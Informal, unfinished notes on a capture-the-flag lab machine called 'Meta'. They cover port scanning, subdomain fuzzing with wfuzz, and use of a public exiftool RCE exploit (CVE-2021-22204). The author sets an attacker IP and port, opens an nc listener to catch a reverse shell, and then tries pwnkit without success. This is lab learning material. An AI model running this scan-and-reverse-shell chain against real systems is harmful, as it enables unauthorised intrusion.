CTF Meta

  1. hosts
  2. rustscan
  3. wfuzz
  4. Exploit exiff
    1. Install exiftool
    2. Install djvulibre
    3. Download
    4. Edit the file
    5. Open the listener
  5. BOOMMMM
  6. Exploit pwnkit

hosts

/etc/hosts
10.10.11.140 artcorp.htb

rustscan

rustscan -a meta.htb  --range 1-65000

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

wfuzz

Nothing with the dir listing
But with the sub listing I have this:
https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains.lst -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 9000 |grep 200


dev01.artcorp.htb.
I add it to my /etc/hosts.


It’s an exif tool, to see the metadatas.

Exploit exiff

https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
I found this website who can give cool infos.
CVE-2021-22204
https://github.com/convisolabs/CVE-2021-22204-exiftool

Install exiftool

https://exiftool.org/install.html

Install djvulibre

sudo pacman -S djvulibre

Download

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git

Edit the file

ip = ‘10.10.15.22’
port = ‘4444’

Open the listener

nc -nlvp 4444

BOOMMMM

I upload the file and the shell pop.

Exploit pwnkit

It’s not working.

I think I have to get the user first.
should also do a directory with all my tools and open the python http server when I need them.

I need th go to sleep…